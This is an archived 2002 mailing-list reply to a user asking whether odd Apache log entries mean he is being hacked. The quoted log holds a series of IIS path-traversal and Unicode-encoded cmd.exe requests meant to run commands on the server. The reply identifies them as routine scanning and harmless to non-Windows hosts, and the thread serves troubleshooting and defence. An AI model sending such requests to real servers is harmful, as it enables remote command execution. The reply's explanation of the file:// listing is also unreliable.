[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Strange httpd/access_log entry



The answer to your first question is Yes... someone is trying to hack you, but that's very common ... 
what's really going on is they are scanning isp's for vulnerable hosts, so they'll go through first and 
scan for port 80 open then they'll input the list of ips into their next scanner which checks for common 
vulnerabilities.  As for the things i see currently, unless you're running Windows on that machine you 
have no worries :)

What do you mean exactly that you get the entire listing for your hard drive? that would mean that you 
have the root dir of your httpd set to the root dir of your hard drive, you can change that in 
httpd.conf if you like.. =)

--Jamon Terrell

4/11/2002 12:02:12 PM, Gary <medmanks@mcleodusa.net> wrote:

>
>Can anyone help me out here... 
>
>I found these entries, is someone trying to hack me?  
>What is really weird is in a browser, if I type file://64.163.212.171/
>I get the entire listing for my HD
>
>Doing a host -a 64.163.212.171 yields a reverse entry for pacbel... 
>
>Log entries are:
>
>64.163.212.171 - - [11/Apr/2002:11:01:34 -0500] "GET
>/scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:35 -0500] "GET
>/MSADC/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:35 -0500] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:36 -0500] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:39 -0500] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:40 -0500] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 329 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:40 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 329 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:41 -0500] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 345 "-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:41 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:42 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:42 -0500] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:43 -0500] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:47 -0500] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:47 -0500] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-"
>"-"
>64.163.212.171 - - [11/Apr/2002:11:01:51 -0500] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
>"-" "-"
>64.163.212.171 - - [11/Apr/2002:11:01:51 -0500] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-"
>"-"
>
>
>-- 
>Best regards,
>Gary   
>
>
>
>-
>To unsubscribe, send email to majordomo@silug.org with
>"unsubscribe silug-discuss" in the body.
>




-
To unsubscribe, send email to majordomo@silug.org with
"unsubscribe silug-discuss" in the body.